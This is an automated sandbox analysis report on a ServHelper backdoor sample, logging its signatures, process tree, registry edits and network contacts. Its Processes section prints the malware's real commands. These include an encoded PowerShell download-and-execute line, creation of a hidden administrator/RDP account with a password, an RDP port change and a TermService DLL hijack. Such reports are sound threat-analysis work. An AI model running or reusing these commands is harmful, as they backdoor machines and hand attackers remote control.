Malware Analysis Report

2024-10-19 04:37

Sample ID 210922-g4b5asedej
Target 61d5e32562d1c70daf0a3112f7888258.exe
SHA256 da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605
Tags
servhelper backdoor discovery exploit persistence suricata trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605

Threat Level: Known bad

The file 61d5e32562d1c70daf0a3112f7888258.exe was found to be: Known bad.

Malicious Activity Summary

servhelper backdoor discovery exploit persistence suricata trojan upx

suricata: ET MALWARE ServHelper CnC Inital Checkin

ServHelper

Grants admin privileges

Modifies RDP port number used by Windows

Possible privilege escalation attempt

UPX packed file

Sets DLL path for service in the registry

Blocklisted process makes network request

Modifies file permissions

Loads dropped DLL

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Suspicious behavior: LoadsDriver

Script User-Agent

Modifies registry key

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-09-22 06:21

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-22 06:21

Reported

2021-09-22 06:24

Platform

win7v20210408

Max time kernel

167s

Max time network

188s

Command Line

"C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"

Signatures

ServHelper

trojan backdoor servhelper

suricata: ET MALWARE ServHelper CnC Inital Checkin

suricata

Grants admin privileges

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\rfxvmt.dll C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e7fc69aa-b31d-4c73-9aee-74b52a70cad7 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_928e1545-d3f4-42aa-8697-b0076d1abc46 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_141a24d8-449e-4974-94ef-285a988282ab C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_229db460-2302-4054-b1b6-982bb0ef94ae C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9880927e-2494-4d24-a7f8-a6fcdff6762e C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_323d885c-4adc-4743-b9e2-dbff51c78107 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e0d11be0-ee1c-4581-81e7-371b7150ce13 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ea27df9c-bc90-40c3-8e19-c43c1104e839 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b816317e-70d8-4475-8151-893cd53f43a2 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y3LFTIR59G5681HH3G32.temp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8b05eb37-a2d3-4e6d-94e4-69a5b87b963f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_74ba2926-1d90-4656-a223-c63556293bb4 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00945e0d8bafd701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1840 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1840 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1840 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 268 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1224 wrote to memory of 268 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1224 wrote to memory of 268 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 268 wrote to memory of 760 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 268 wrote to memory of 760 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 268 wrote to memory of 760 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1224 wrote to memory of 1552 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1552 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1552 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1224 wrote to memory of 1756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1224 wrote to memory of 1756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1224 wrote to memory of 1696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1368 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1368 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1368 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 624 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 624 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 624 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1224 wrote to memory of 1332 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1224 wrote to memory of 1332 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1224 wrote to memory of 1332 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1224 wrote to memory of 1820 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1224 wrote to memory of 1820 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1224 wrote to memory of 1820 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1224 wrote to memory of 1616 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1224 wrote to memory of 1616 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1224 wrote to memory of 1616 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1224 wrote to memory of 1492 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1224 wrote to memory of 1492 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1224 wrote to memory of 1492 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1492 wrote to memory of 1844 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1492 wrote to memory of 1844 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1492 wrote to memory of 1844 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1224 wrote to memory of 1084 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1224 wrote to memory of 1084 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1224 wrote to memory of 1084 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1084 wrote to memory of 1800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1084 wrote to memory of 1800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1084 wrote to memory of 1800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1800 wrote to memory of 1632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe

"C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\01ximcta\01ximcta.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81DB.tmp" "c:\Users\Admin\AppData\Local\Temp\01ximcta\CSC1CD5A0B993214D799C33BD3EA94FE8DB.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc lfOn4usP /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc lfOn4usP /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc lfOn4usP /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc lfOn4usP

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc lfOn4usP

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc lfOn4usP

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 zuvujvhuaif.xyz udp
MD 185.163.45.186:443 zuvujvhuaif.xyz tcp

Files

memory/1840-60-0x0000000041740000-0x0000000041B3F000-memory.dmp

memory/1840-63-0x00000000412C4000-0x00000000412C6000-memory.dmp

memory/1840-62-0x00000000412C2000-0x00000000412C4000-memory.dmp

memory/1840-64-0x00000000412C6000-0x00000000412C7000-memory.dmp

memory/1840-65-0x00000000412C7000-0x00000000412C8000-memory.dmp

memory/1224-66-0x0000000000000000-mapping.dmp

memory/1224-67-0x000007FEFB9F1000-0x000007FEFB9F3000-memory.dmp

memory/1224-68-0x0000000001F00000-0x0000000001F01000-memory.dmp

memory/1224-69-0x000000001ADE0000-0x000000001ADE1000-memory.dmp

memory/1224-70-0x000000001AC60000-0x000000001AC62000-memory.dmp

memory/1224-71-0x000000001AC64000-0x000000001AC66000-memory.dmp

memory/1224-72-0x0000000001F60000-0x0000000001F61000-memory.dmp

memory/1224-73-0x0000000002030000-0x0000000002031000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

memory/1224-75-0x000000001AB80000-0x000000001AB81000-memory.dmp

memory/268-76-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\01ximcta\01ximcta.cmdline

MD5 68a3697e32d417f2e9290858efcaa7c7
SHA1 40ab8410e13c5905fc5bff937c97b77d6f301ca1
SHA256 6fcf0da1bf1c50496186b7ce9e50166af41b3cfb020e58b29fed1852c09bf171
SHA512 6578a96e9a07e7224a23ef81db374982d9c19517db8f3af743941e58b5aa9d0acaac81cf7ed4140e701373fbc5189ee2907b870ddecea50e598c2f9d74fe8ead

\??\c:\Users\Admin\AppData\Local\Temp\01ximcta\01ximcta.0.cs

